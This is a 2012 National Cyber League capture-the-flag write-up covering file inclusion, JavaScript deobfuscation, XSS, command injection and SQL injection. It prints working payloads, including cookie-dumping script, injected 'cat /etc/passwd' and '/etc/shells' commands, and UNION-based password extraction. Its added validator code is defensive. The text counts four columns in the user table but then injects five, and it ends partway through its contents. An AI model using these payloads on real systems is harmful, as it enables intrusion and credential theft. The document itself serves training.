Challenge Explanations
National Cyber League Fall 2012

I. Introduction

The 2012 pilot season of the National Cyber League provided collegiate participants with a digital training ground to develop, demonstrate, and test their cyber security skills in a real-world, fast-paced environment. The season culminated in an individual "Capture The Flag" exercise developed and delivered remotely by ThreatSPACE TM, a division of iSIGHT Partners SM.

The individual cyber security competition ran simultaneously in three geographic regions: Eastern, Mid-West, and Western. Within each region three competition rounds were delivered. The first focused on Web Application Security and Exploitation, the second centered on Log Analysis and Incident Response, and the third and final 'regular season' round covered a wide range of cryptography-related challenges.

At the conclusion of all three regular season rounds, the top ten (10) participants from each region were invited to compete in a National Final. Finalists were given access to all previously unsolved challenges as well as a few new puzzles, so that points were distributed evenly across all three high-level proficiencies.
For Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved

Table of Contents

I. Introduction ... 1
II. Round One - Web Security ... 4
    A. Flags ... 4
    B. The Secure Socket Layer Organizational Unit (SSL OU) ... 5
    C. Target One - Local File Inclusion ... 6
    D. Target Two - JavaScript Obfuscation ... 10
    E. Target Three - Service Exploitation ... 15
    F. Target Four - Cross-Site Scripting ... 18
        1. Flag One ... 20
        2. Flag Two ... 20
        3. Flag Three ... 21
        4. Flag Four ... 21
        5. Flag Five ... 23
    G. Target Five - Command Injection ... 25
        1. Flag One ... 26
        2. Flag Two ... 27
        3. Flag Three ... 28
        4. Flag Four ... 29
        5. Flag Five ... 29
    H. Target Six - SQL Injection ... 31
III. Round Two - Log Analysis ... 34
    A. Scenario ... 34
    B. Flags ... 35
    C. Windows Security Log ... 38
    D. Corrupt Windows Security Log ... 38
    E. Linux Authentication Log ... 40
    F. Corrupt Linux Authentication Log ... 41
    G. Apache Log ... 42
    H. Network Data Capture ... 43
IV. Round Three - Cryptography ... 45
    A. Scenario ... 45
    B. Flags ... 46
    C. Linux Passwords ... 48
        1. Hashing Algorithms ... 48
        2. Cracked Passwords ... 49
    D. Windows Passwords ... 50
    E. Basic Cryptography ... 51
        1. Challenge One ... 51
        2. Challenge Two ... 51
        3. Challenge Three ... 51
        4. Challenge Four ... 52
        5. Challenge Five ... 52
        6. Challenge Six ... 53
        7. Challenge Seven ... 53
        8. Challenge Eight ... 54
        9. Challenge Nine ... 54
        10. Challenge Ten ... 55
    F. Advanced Cryptography ... 56
        1. Puzzles One, Two, and Three ... 56
        2. Puzzles Four and Five ... 56
    G. Steganography ... 57
        1. First Puzzle ... 57
        2. Second Puzzle ... 57
        3. Third Puzzle ... 58
        4. Fourth Puzzle ... 59
        5. Fifth Puzzle ... 59
        6. Sixth Puzzle ... 60
        7. Seventh Puzzle ... 61
V. NCL Championship ... 65
    A. Flags ... 65
    B. Network Data Analysis ... 66
    C. Web Exploitation - Target Three ... 67
II. Round One - Web Security
In the first round contestants were to locate twenty-one (21) flags, found across six (6) targets. Each target hosted a different web application focused on a specific web exploitation skill.

A. Flags

Name | Server
What is the SSL OU at this address? | 54.243.141.68 (Target 1)
What is the flag value in this web app? | 54.243.141.68 (Target 1)
What is the SSL OU at this address? | 54.243.157.198 (Target 2)
What is the flag value in this web app? | 54.243.157.198 (Target 2)
What is the SSL OU at this address? | 54.243.157.201 (Target 3)
Which glibc function is being used insecurely in the binary? | 54.243.157.201 (Target 3)
What is the SSL OU at this address? | 54.243.157.202 (Target 4)
What is flag one at this address? | 54.243.157.202 (Target 4)
What is flag two at this address? | 54.243.157.202 (Target 4)
What is flag three at this address? | 54.243.157.202 (Target 4)
What is flag four at this address? | 54.243.157.202 (Target 4)
What is flag five at this address? | 54.243.157.202 (Target 4)
What is the SSL OU at this address? | 54.243.157.208 (Target 5)
What is flag one at this address? | 54.243.157.208 (Target 5)
What is flag two at this address? | 54.243.157.208 (Target 5)
What is flag three at this address? | 54.243.157.208 (Target 5)
What is flag four at this address? | 54.243.157.208 (Target 5)
What is flag five at this address? | 54.243.157.208 (Target 5)
What is the SSL OU at this address? | 54.242.95.129 (Target 6)
What is the password for jsmith at this address? | 54.242.95.129 (Target 6)
What is the item with ID #6 at this address? | 54.242.95.129 (Target 6)
B. The Secure Socket Layer Organizational Unit (SSL OU)
Each target was accessible over HTTPS; as such, each target had a unique Secure Socket Layer (SSL) certificate. Within each target's certificate there was a flag, found in the organizational unit (OU) field.

The player was able to obtain this flag directly through the web browser by reviewing the certificate details. In fact, because each certificate was self-signed, most browsers would first prompt the user to review the certificate and ultimately accept it. Regardless of the method, once the certificate information was displayed, the flag could be retrieved from the OU field.
C. Target One - Local File Inclusion
The first target the players would encounter displayed nothing more than a clown, a dropdown list (containing a list of colors), and a button labeled "Change Background".

Upon selecting a color, the contestant should notice two relevant items. First, the background clearly changes to the specified color, and second, the URL changes to include a 'background' parameter. This parameter happens to match the selection submitted from the dropdown.
https://target-one/?background=Green
It is at this point that the participant will hopefully begin manipulating the parameter's value via the URL. One important clue is that any invalid entry sets the background to white, but does not produce an error.
https://target-one/?background=FooBar
https://target-one/?background=Black
Concluding that only the colors in the list work, one may look for items at the root of the web service named after the valid colors.
https://target-one/Blue
This would result in a page containing only the color specified. Furthermore, the source of that page would reveal the following HTML, and nothing else.

<body bgcolor="blue">

At this point one might conclude that the file named by the "background" parameter is simply being included directly in the base PHP page.
The curious would now scan the target and notice that in addition to TCP port 80 (HTTP), TCP port 21 (FTP) was open. Connecting to this port would reveal an FTP service that allowed anonymous login.
220 (vsFTPd 2.3.5)
530 Please login with USER and PASS.
Name (target-one:player): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
After a simple permission test, the player would learn they have read and write access to this FTP service. Knowing the system is running a Linux distribution (obtainable via the previously completed scan) and the vsFTPd service (found in the FTP welcome message), the contestant should know they are within the /srv/ftp/uploads directory.

With all of the previously gained information, access to the flag is relatively easy: the player can upload a PHP script to the FTP service, and then locally include it via the "background" URL parameter.

Unfortunately this inclusion will not work as-is. Further testing will reveal that the inclusion is appending ".html" to the end of the included file name. Therefore the uploaded file must end in ".html" as well.

Uploading something like the following to a file ending in ".html" and including it would reveal the directory listing of the web service's working directory.

The execution of the above code would have each file name URL-encoded and then printed to the page on its own line. This would reveal that the previously discovered file is named with four spaces. Simply printing the file contents, which can be done through the web browser, will get the participant to the next step.
https://target-one/%20%20%20%20
The file contains some information explaining that it, in and of itself, is not the flag, but that the MD5 of the proper string is the flag.
This is not the flag, but if you can figure out what it is, get its MD5 and you win!!!
TXlJZGVudGl0eU11c3RBbHdheXNCZVNlY3JldA==
The string following the text is Base64 encoded; decoding it returns a new string.
MyIdentityMustAlwaysBeSecret
Taking the above string and obtaining its MD5 is the solution.
19b405425c0d5b506dcfc77caa5b6d68
D. Target Two - JavaScript Obfuscation
The second target the players will encounter presents them with yet another clown, this time accompanied by a text entry box and a Submit button.

Entering text into the text box and submitting it would perform a GET request to the page, with the entered text as the value of a parameter named with a 32-character hexadecimal (MD5-style) string.
The obfuscation is simple to follow: all of the strings and function names are hexadecimally encoded and stored in the first array. Next, all variables are renamed to a nonsensical string of numbers.

There are numerous resources publicly available to assist in the process of de-obfuscation. There are two main tasks one should complete: reformatting the code for better readability and decoding any encoded data (such as the functions and strings in this puzzle). A great public resource capable of doing both of these tasks can be found at:
http://jsbeautifier.org/
After the participant has obtained a more readable copy of the JavaScript, they should notice that the _0x12F1xC JavaScript function is executed when data is submitted through the HTML form.

The player should now perform some basic de-obfuscation, which would show that the initial JavaScript function is acting as a substitution cipher between the two character lists decoded from the initial array.

Next, the initial JavaScript function passes the input from the form on to a second JavaScript function. This function, amongst other things, compares the value passed in against a value stored in the initial array.

Using a bit of JavaScript debugging with either Firebug (Firefox) or the Developer Console (Chrome), the player could obtain the converted string as well as the modulus value that _0x12F1xC is passing to the next function.
// Run in the browser console on Target Two, where the obfuscator's string
// array _0x55cd is already defined. The decoded entries used below are the
// empty string, the two substitution lists and, evidently, the property
// names "length", "substring", "indexOf" and "charAt".
var _0x1203x5 = "zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC";
_0x1211xC = _0x1203x5;
var _0x1203x6 = _0x55cd[3];   // first character list
var _0x1203x7 = _0x55cd[4];   // second character list
var _0x1203x8 = _0x55cd[0];   // "" (accumulator for the converted string)
var _0x1203x9 = 0;
var _0x1203xa = 1;
// Substitution: take one character at a time, find it in the first list and
// emit the character at the same index in the second list.
while (_0x1203x9 != _0x1203x5[_0x55cd[5]]) {
    _0x1203x8 += _0x1203x7[_0x55cd[8]](_0x1203x6[_0x55cd[7]](_0x1203x5[_0x55cd[6]](_0x1203x9, _0x1203xa)));
    _0x1203x9++;
    _0x1203xa++;
}
// Shift for the next stage: length modulo 9, with a remainder of 0 replaced by 3.
var _0x1203xb = _0x1203x5[_0x55cd[5]] % 9;
if (_0x1203xb == 0) {
    _0x1203xb = 3;
}
console.log(_0x1203x8);
console.log(_0x1203xb);
We now have the proper values to pass into the second JavaScript function.

aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX
2

Submitting the previously obtained string does not change the page's output or source code. So it should be clear to the player that the second function does something else to the input (from the form). A bit more JavaScript debugging and the participant will discover that the second function is shifting the characters like a Caesar cipher.
// Run in the same console; the two values below are the ones printed by the
// previous snippet. Note that the obfuscated code uses "let" as a plain
// variable name, which only works in non-strict script code.
_0x1203xd = "aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX";
_0x1203xb = 2;
_0x2DD1xC = _0x55cd[9];    // one 26-character alphabet
_0x2EE1xC = _0x55cd[10];   // the other 26-character alphabet
_0x68E7xC = _0x55cd[0];    // ""
_0x31F1xC = _0x55cd[0];    // ""
_0x1203xb = eval(_0x1203xb);
// First pass: rotate every character found in the first alphabet by the shift.
for (i = 0; i < _0x1203xd[_0x55cd[5]]; i++) {
    let = _0x1203xd[_0x55cd[8]](i);
    pos = _0x2EE1xC[_0x55cd[7]](let);
    if (pos >= 0) {
        _0x68E7xC += _0x2EE1xC[_0x55cd[8]]((pos + _0x1203xb) % 26);
    } else {
        _0x68E7xC += let;
    }
}
// Second pass: the same rotation for the other alphabet.
for (i = 0; i < _0x68E7xC[_0x55cd[5]]; i++) {
    let = _0x68E7xC[_0x55cd[8]](i);
    pos = _0x2DD1xC[_0x55cd[7]](let);
    if (pos >= 0) {
        _0x31F1xC += _0x2DD1xC[_0x55cd[8]]((pos + _0x1203xb) % 26);
    } else {
        _0x31F1xC += let;
    }
}
console.log(_0x31F1xC);
The above code will reveal the properly encoded version of the string.
cDxnErOijHvzWhfJkOtsAlBCdEgRoMCDwTGXkZ
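The Caesar stage above, rewritten readably as an added example (this is not the challenge's code). It assumes the two decoded alphabets are plain a-z and A-Z, and it takes the shift exactly as the first function computes it: string length modulo 9, with 0 replaced by 3.

```javascript
// Added example, not the challenge's own code: the Caesar-style second stage
// of Target Two's JavaScript. Assumption: the two alphabets decoded from the
// obfuscator's array are lowercase a-z and uppercase A-Z.

const LOWER = 'abcdefghijklmnopqrstuvwxyz';
const UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

// The first function derives the shift from the length of the string it
// converted: length modulo 9, with a remainder of 0 replaced by 3.
function shiftValue(str) {
  const m = str.length % 9;
  return m === 0 ? 3 : m;
}

// One pass with one alphabet: characters found in it are rotated by `shift`,
// everything else is copied through unchanged.
function rotate(text, alphabet, shift) {
  let out = '';
  for (const ch of text) {
    const pos = alphabet.indexOf(ch);
    out += pos >= 0 ? alphabet.charAt((pos + shift) % 26) : ch;
  }
  return out;
}

// The second function runs one pass per alphabet. Because the alphabets are
// disjoint, every letter is shifted exactly once and case is preserved.
function caesarStage(converted, shift) {
  return rotate(rotate(converted, LOWER, shift), UPPER, shift);
}

// Inverse mapping, handy when checking what a submitted value decodes to.
function caesarStageInverse(encoded, shift) {
  return caesarStage(encoded, (26 - (shift % 26)) % 26);
}

// Values from the write-up: the substitution output and the string the form expects.
const CONVERTED = 'aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX';
const EXPECTED = 'cDxnErOijHvzWhfJkOtsAlBCdEgRoMCDwTGXkZ';

// Reproduce the write-up's result: the converted string has the same length as
// the original input (38 characters), so the shift is 38 % 9 = 2.
function demo() {
  const shift = shiftValue(CONVERTED);
  const encoded = caesarStage(CONVERTED, shift);
  return { shift, encoded, matches: encoded === EXPECTED };
}

console.log(demo());
```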
When the player enters the above string in the input box and submits the form, something different happens. Instead of setting the entered value on the original hexadecimal-named parameter, it sets a different parameter, 5e3f5b33a23af6daf1ef8e35c393681f.

As this target presents no way to introduce new or additional code, the solution must be present within the already existing code. Including the 'index.php' file will reveal the actual PHP code.

The PHP code is obfuscated. Two distinct sections of the code are clearly encoded using Base64. Decoding the first PHP variable will uncover a new set of PHP instructions.

While this code looks partially readable, and some of its contents will be familiar to the player, it is still partially obfuscated. The second portion of the original PHP code needs to be de-obfuscated to uncover the key to de-obfuscate this new code.

This second section of code clearly replaces the vowels of the previous code block. Reversing this should reveal the following:
<?php
// Error handler that silently swallows every error.
function customError($errno, $errstr) { return 0; }
$info = $_GET['5e3f5b33a23af6daf1ef8e35c393681f'];
if ( $info == "MarcusMongoFawkesIsDaManWithDaSecretWeapon" ){
    echo "<center><font color=\"White\"><h1>Congratz! You beat the Troll!! <br /> The flag is: ";
    echo md5("DwightIzRoxxStar");
    echo "</font></h1></center>";
}
set_error_handler("customError");
// The parameter is also used, unfiltered, as a file path to read and echo.
echo file_get_contents($info);
As the player should now realize, passing "MarcusMongoFawkesIsDaManWithDaSecretWeapon" in the parameter labeled '5e3f5b33a23af6daf1ef8e35c393681f' will return the flag.
Congratz! You beat the Troll!! The flag is: 1290c8ae9f867dde48f16044b9e18bc1
E. Target Three - Service Exploitation
The third challenge provided the player with nothing more than a download link. The flag asks which glibc function was being used insecurely in the binary. Examining the binary would reveal that it was a Linux ELF binary.
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
Further review would lead the player to the fact that this binary would normally be running on a server with a flag file and a key file. The binary would take the key file as input from the end-user and, upon receiving the proper key, return the flag. In this exercise, however, the goal is simply to find the vulnerable function call, and not to weaponize an exploit against the service.

A quick listing of the function calls from the binary will provide some prospective candidates for the vulnerable function call.

At this point the contestant should be able to narrow the list down to the commonly misused functions, resulting in a much smaller instruction set to reverse engineer.
strcpy
memset
getchar
memcpy
malloc
strcat
write
Now the participant should step through the program execution in a debugger, like IDA Pro or the GNU Debugger, paying particular attention to the glibc function calls listed above.

Given the fact that readlink doesn't NULL-terminate strings, and that malloc is called twice, followed by a sprintf call, we can see that sensitive memory would be leaked in the subroutine at 0x8048BEF.

So malloc would be the proper answer to the flag question.
F. Target Four - Cross-Site Scripting
The fourth web exploitation puzzle provides the player with a search portal for "Ted's Research Projects." The page contains a simple text box and a "Search" button. The flag list indicates there are five (5) flags for this challenge.

Entering text and submitting it will result in a request that assigns the "search" parameter the value entered by the user. In addition, "results" will show in the center of the screen.
https://target-four/?search=test&submit=Search
No Result Found For: test
One additional element that appears on the page is a link titled "Search Permalink." A permalink is a unique URL that will permanently return a user to a given dynamic page. Permalinks are often found on search-related pages, allowing a user to save the results for later or share them with others.

Clicking on the permalink will bring the player to an identical page, content-wise, but the URL parameters have changed.
https://target-four/?perma=dGVzdA==
The player will likely notice that the value of "perma" is Base64 encoded:
echo "dGVzdA==" | base64 -d
test
Entering more common English terms, such as "the", will actually return relevant results.
https://target-four/?search=the&submit=Search
One item the player should notice is the presence of their search term on the page. If the input is not being properly sanitized, this is a clear indication of a cross-site scripting vulnerability.

A quick test will reveal that the input is not being properly sanitized.

https://target-four/?search=<blink>test<%2Fblink>&submit=Search

Now that the player has a decent understanding of the proper usage of the interface and an idea of the vulnerability, they should look at the page source. In doing so the player will uncover a list of flag hints within a set of HTML comments.
<!-- There are five flags on this XSS vulnerable page --!>
<!-- Flag 1: Cause an alert box to popup via a permalinked search URL --!>
<!-- Flag 2: Print your cookie to screen via a permalinked search URL --!>
<!-- Flag 3: Insert an iframe (linking to a third party) on the page via a permalinked search URL --!>
<!-- Flag 4: Send your cookie to a third party server via a permalinked search URL --!>
<!-- Flag 5: Change the page heading to read "flag5" (no qoutes) via a permalinked search URL --!>
The requirement is to exploit a cross-site scripting vulnerability, performing a specific action, and saving the link via the Permalink URL. This allows the exploitation to be first tested, and then "saved" via the permalink to retrieve the flag value.

1. Flag One

The first task is relatively easy; the participant simply needs to pop up a JavaScript alert box. As the search box is using a simple GET request, the player can either enter their script into the Search box, or manipulate the URL parameters directly.

The following URL will cause an alert with the contents of "test."

At this point clicking on the "Search Permalink" link will return the first flag.
1st Flag Is: NCL-ERYT-5346

2. Flag Two
The second flag requires the cookie to be written to the screen. One of the simplest JavaScript functions is document.write. The document.write function allows text, code, or variables to be printed directly to the page. The following URL will present the cookie in the document where the search term is displayed.

https://target-four/?search=<script>document.write(document.cookie);</script>&submit=Search
ted_search=beridian+dynamics
A quick click on the "Search Permalink" will return the second flag.

2nd Flag Is: NCL-UYSZ-4578

3. Flag Three
The third flag for this challenge requires an iframe to be added to the page, linking to a third-party site. Again, the player can use the document.write function to manipulate the page contents. This time the contestant will need to write out the HTML code for an iframe.

Again, the player will need to click the "Search Permalink" link to get the flag.
3rd Flag Is: NCL-LJSH-8943
4. Flag Four
The fourth flag increases the complexity of the permalink portion. For this flag the participant needs to redirect the browser to a new location with the cookie as a parameter. This is a common exploitation of a cross-site scripting vulnerability, resulting in the attacker obtaining access to the victim's authenticated account.

The following URL will properly send the cookie to a third party, but it will also redirect the browser to a new page, making it difficult to click the "Search Permalink" link. However, the correct value must be submitted as a permalink in order to obtain the flag value.
At this point the player must go back through the previous challenges to understand how the permalink is generated. So far the only fact known is that the searched value is Base64 encoded. If the player takes a look at the third-flag permalink, they will discover that more than simple Base64 encoding is taking place.

The contestant should notice that all HTML entities are actually encoded. So, simply taking the injected code and Base64 encoding it will not work; instead the player must first convert the HTML entities, and then Base64 encode the result.
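The two-layer permalink format just described, as an added example that is not part of the write-up: it reproduces the "perma" encoding (HTML entities, then Base64) and reverses it so that a logged permalink can be reduced to the raw search term it carries. The entity table (the five characters PHP's htmlspecialchars escapes) is an assumption, and the sample permalinks are constructed here.

```javascript
// Added example, not the challenge's own code: encode and decode Target Four's
// "perma" parameter as the write-up describes it. Assumption: the entity layer
// escapes & < > " and ' the way PHP's htmlspecialchars does.

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
const CHARS = Object.fromEntries(Object.entries(ENTITIES).map(([c, e]) => [e, c]));

function htmlEntities(text) {
  return text.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

function htmlEntityDecode(text) {
  return text.replace(/&(?:amp|lt|gt|quot|#039);/g, (e) => CHARS[e]);
}

// perma = base64(htmlentities(search)). Base64 alone only agrees with this for
// terms without markup characters, which is why "test" round-trips so cleanly.
function encodePermalink(search) {
  return Buffer.from(htmlEntities(search), 'utf8').toString('base64');
}

// Reverse both layers to recover the raw search term behind a logged permalink.
function decodePermalink(perma) {
  return htmlEntityDecode(Buffer.from(perma, 'base64').toString('utf8'));
}

// Triage check for a decoded term: anything that looks like an HTML tag.
function looksLikeMarkup(search) {
  return /<\s*\/?[a-z]/i.test(search);
}

// Constructed sample of permalinks an analyst might pull from access logs;
// the first is the one shown in the write-up, the others are built here.
const SAMPLE_PERMAS = [
  'dGVzdA==',
  encodePermalink('the'),
  encodePermalink('<blink>test</blink>'),
];

function triage(permas) {
  return permas.map((p) => {
    const term = decodePermalink(p);
    return { perma: p, term, markup: looksLikeMarkup(term) };
  });
}

console.log(triage(SAMPLE_PERMAS));
```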
Here is the original script being injected to complete the objective for flag four:

Which returns the fourth flag for target four.
4th Flag Is: NCL-EHDF-9623

5. Flag Five
The fifth and final flag for target four requires the user to manipulate the page heading.

Reading the page source, the player should notice that one particular element is actually labeled as the "heading."
<h1 id="heading">Ted's Research Portal :: Search</h1>
Utilizing the JavaScript document.getElementById function the player can directly interact with this element, and complete the task of changing the value to "flag5."

The object returned by document.getElementById exposes a property, "innerHTML", which can be manipulated to change the contents of the specified HTML tag.

The above URL will result in the appropriate heading change, as required to retrieve the fifth flag. As always, the answer will only be obtained once the permalink is generated.

However, this time a new response is returned instead of the flag value.
FLAG5 XSS DETECTED $ DENIED
Clearly the web application is doing some limited filtering; this is akin to an ecommerce application checking for manipulation of an item price, instead of fixing the cross-site scripting vulnerability itself.

At this point the player will need to experiment with cross-site scripting detection evasion, specifically encoding.

It turns out that this web application is simply looking for the value "flag5" being set as the innerHTML for the page heading. Leaving all of the injected script intact, and simply encoding the string "flag5" (in either HTML or UTF-8 encoding schemes) will return the flag.

The flag would be returned with either of the above permalinks.
5th Flag Is: NCL-EFSF-7823
G. Target Five - Command Injection
For this puzzle the player is presented again with a web application, this time a Network Testing interface. The network testing application provides numerous tools, such as: ping, trace route, DNS lookup, whois, and configuration file searching.
Each of the tools works, performing its respective action. The player should review the page's source code to find five (5) HTML comments providing directions on what is required for each of the five (5) flags.
<!-- There are five flags on this XSS vulnerable page --!>
<!-- Flag 1: Using PING Form, cat /etc/passwd --!>
<!-- Flag 2: Using TraceRouter Form, cat /etc/group --!>
<!-- Flag 3: Using DNS Lookup Form, cat /etc/motd --!>
<!-- Flag 4: Using Whois Form, cat /etc/shells --!>
<!-- Flag 5: Using Find Config Files Form, cat /etc/profile --!>
In Linux there are a few ways to end the execution of one command and begin another. The pipe is one of the most commonly used methods to execute numerous commands on a single line; however it specifically takes the output (stdout) from the first command and feeds it (stdin) into the second command. Depending on our goal this may not work as we desire. The two other methods execute the commands independently of each other: the double ampersand and the semi-colon. Using a double ampersand the second command will only execute if the first one exits properly (no errors), and the semi-colon will run the second command regardless.
Most of the challenge will actually accept any of the above three methods, but this write-up will usually use the semi-colon, unless otherwise specified.
1. Flag One
The first task is to use the ping tool to obtain the /etc/passwd file. The /etc/passwd file contains authentication information for Linux systems. The directions specifically indicate that the file should be "cat'd" - cat, or concatenate, is a Linux tool that can be used to join multiple files together, but in the great usefulness that is Linux utilities it doubles as a tool commonly used to dump file contents to the screen, a piped command, or a file.
While using the various tools provided on the page, the player should come to the conclusion, based on the output, that the values they enter are being passed into the relevant Linux commands for the given task.
Just like the cross-site scripting vulnerabilities, if the input accepted from the user is not first sanitized, the user could inject his or her own commands.
Entering the following command injection test into the PING form indicates that input is not being sanitized and command injection is indeed possible.
Now the participant simply needs to inject the command they were provided in the source code:
; cat /etc/passwd
Which indeed returns the first flag.
1st Flag Is: NCL-TYIA-1682
2. Flag Two
The second flag requires the contestant to cat the /etc/group file from the Trace Route tool. The /etc/group file is yet another file that contains authentication related information for Linux.
; cat /etc/group
The previous command does not provide the flag nor the expected output, but instead an error.
Error: Must enter a valid IP Address
It should now be apparent to the player that this form is doing some limited input validation.
Providing just any input before the semi-colon doesn't work; the value must be a valid IP address.
8.8.8.8; cat /etc/group
Which provides the second flag:
2nd Flag Is: NCL-MVBC-1354
3. Flag Three
The third flag required the player to output the message of the day file (/etc/motd) through the DNS Lookup tool.
Knowing the previous tool input had some limited validation, and that this tool is anticipating a domain name, the player would try something along the lines of the following:
google.com; cat /etc/motd
However this will not work, and will provide a new error.
Error: Must End In Valid TLD (.com, .net, .org, .gov)
The error is clear in the fact that the input must end with a TLD (and specifically one mentioned in the error message). Luckily the cat utility handles nonexistent files gracefully and still prints the ones that do exist. So simply adding a ".com", or one of the other allowed TLDs, to the end of the command (separated by a space from the path to the message of the day) would work.
google.com; cat /etc/motd .com
3rd Flag Is: NCL-AEFW-1680
4. Flag Four
The fourth flag requires the /etc/shells file to be obtained via the Whois tool form. A quick first attempt would likely result in an error.
; cat /etc/shells
Command Injection Found - Denied
Indeed this tool form is doing input validation and is specifically blocking our command injection. Trial and error on the player's part will likely reveal that it is the semi-colon that is alerting the web application to the command injection attempt. The double ampersand will also cause the web application to block the attempt. Only the pipe method will work.
| cat /etc/shells
The above will get the participant around the command injection check, but it still results in an error.
Error: Must End In Valid TLD (.com, .net, .org, .gov) Or be a valid IP
Combining the previously learned techniques, the player can now easily obtain this fourth flag.
| cat /etc/shells 8.8.8.8
4th Flag Is: NCL-PUIQ-2347
5. Flag Five
The fifth and final flag for this challenge is a configuration search form. Unlike the other tools, this one simply lists files that match the text entered by the user.
Testing different search patterns will reveal that the form is performing a "find" within the /etc directory. This flag will require some understanding of how the find command works, specifically because the input from the user is being placed into the middle of the find command, so simply ending the previous command and starting a new one will not be possible.
Luckily find has a built-in execute option, which allows the output of the command to be passed to a new command for execution. In this case the player needs to return the /etc/profile file.
The following injection will find a file (/etc/motd) and pass it to be executed by the provided command (cat /etc/profile), resulting in the required file being cat'd and the flag being returned.
motd" -exec cat /etc/profile {} \;"
5th Flag Is: NCL-KDGD-0373
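The five forms above fail in a recurring way: each checks a fragment of the input (a leading IP, a trailing TLD, the absence of two separators) and then hands the whole string to a shell. The following added example, written for this write-up and not part of the challenge's code, reconstructs those three weak checks as they behave in the text, then shows the allowlist plus argv-based execution that a defender would use instead; the weak validators are modelled on the observed behaviour, since the challenge's own source is not shown.

```python
import ipaddress
import re

# Weak validators modelled on what the write-up observes in the challenge's forms (the
# checks are reconstructed for this example; the challenge's own code is not shown).
ALLOWED_TLDS = (".com", ".net", ".org", ".gov")
# Exactly one hostname: dot-separated labels of letters, digits and inner hyphens,
# finished by an alphabetic TLD. Nothing else (no spaces, no shell characters) fits.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.IGNORECASE)


def weak_starts_with_ip(value: str) -> bool:
    """Trace Route form: only the leading token must be an IP, so a trailing '; cmd' survives."""
    head = re.split(r"[;|&\s]", value.strip(), maxsplit=1)[0]
    try:
        ipaddress.ip_address(head)
    except ValueError:
        return False
    return True


def weak_ends_with_tld(value: str) -> bool:
    """DNS Lookup form: only the suffix is checked, so anything ending in ' .com' passes."""
    return value.rstrip().lower().endswith(ALLOWED_TLDS)


def weak_denylist(value: str) -> bool:
    """Whois form: rejects ';' and '&&' but not '|' (nor newlines, backticks or $( )),
    which is why denylists of shell metacharacters keep failing."""
    return ";" not in value and "&&" not in value


def strict_target(value: str) -> str:
    """Allowlist: the entire value must be exactly one IP address or one hostname."""
    candidate = value.strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        pass
    if HOSTNAME_RE.match(candidate):
        return candidate.lower()
    raise ValueError(f"rejected target: {value!r}")


def strict_accepts(value: str) -> bool:
    """Convenience wrapper: True when strict_target() would accept the value."""
    try:
        strict_target(value)
    except ValueError:
        return False
    return True


def build_ping_argv(value: str) -> list:
    """Argv for subprocess.run(argv) with shell=False: with no shell involved, ';', '|'
    and '&&' are ordinary characters inside one argument, and the allowlist above
    rejects them before they get that far."""
    return ["ping", "-c", "4", strict_target(value)]


if __name__ == "__main__":
    for payload in ("8.8.8.8; cat /etc/group", "google.com; cat /etc/motd .com",
                    "| cat /etc/shells 8.8.8.8", "8.8.8.8", "google.com"):
        weak = (weak_starts_with_ip(payload), weak_ends_with_tld(payload), weak_denylist(payload))
        print(f"{payload!r:40} weak(ip,tld,denylist)={weak} strict={strict_accepts(payload)}")
```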
H. Target Six - SQL Injection
The sixth target provides the player with nothing more than a login, asking for a Username and Password.
Upon testing, the player should quickly learn that the Login is vulnerable to SQL Injection, a common authentication problem for database-backed web applications.
A simple SQL injection (entered in both the Username and Password fields) will result in the player being logged in as the admin.
' or ''=''
Congrats admin. You are authenticated.
There are however two (2) flags for this challenge. The player needs to obtain the password for the 'jsmith' account and the item name for the item with an ID of 6.
Fortunately the web application will display the SQL that was executed if you are successfully authenticated (or, specifically, if the query succeeds).
Select * from tblUsers where UserName='' or ''='' and password='' or ''=''
Now that the player has confirmed their ability to inject content into the SQL query, their next task is to obtain the password for jsmith. The above query reveals a few relevant pieces of information: the user table name (tblUsers) and two fields from the user table (UserName and Password).
The participant should note that the interface welcomes the user by some type of name (possibly the UserName) upon successful login. It is possible with this output to manipulate the query to return the needed information.
All future login attempts with this web application should manipulate only the password field, leaving the username blank (or with an always-true condition like the one previously used).
A UNION is a special SQL query connector that matches the output of one query with that of another, combining them into one large result set. The injection needs to be a UNION that returns the password field from the user table, but also limits the results to a single row, specifically the row with the relevant password in it. Either limiting the first query or using conditions to remove returned rows one-by-one can do this. For obvious reasons limiting the first query is a much quicker method in this case, but the condition method is useful when attempting to enumerate the entire table's contents.
The following injection should return the password for 'jsmith':
' OR ''='' LIMIT 0 UNION SELECT Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName
The above injection will however fail. The reason the query fails is simple: the number of columns for a UNION must match (the same number in the first and second query). The player should now experiment with different numbers of columns in the second query, until it succeeds. The contestant will soon come to learn that the user table has four columns and thus the second query being injected must also return four columns.
' OR ''='' LIMIT 0 UNION SELECT Password, Password, Password, Password, Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName
Which provides us the flag in the welcome message output.
Congrats NCL-DGSO-4432. You are authenticated.
Based on the flag formatting, and the obvious intention of our injection, the flag is clearly identifiable in the welcome message. Now the participant will move on to the item with an ID of 6. Common sense would indicate that the items are not stored in the user table; of course this is verifiable by enumerating the entire table with the technique detailed previously.
Thus far there has been no indication of the name of the second table, so that must be queried before we can obtain the proper item information.
MySQL happens to have a useful schema, INFORMATION_SCHEMA, which contains relevant metadata such as the names of tables and columns. This schema can be queried, like any other table, to return the information the player is after. The following injection will return the first table in the database:
' OR ''='' LIMIT 0 UNION SELECT table_name, table_name, table_name, table_name, table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema != 'performance_schema' ORDER BY 'UserName
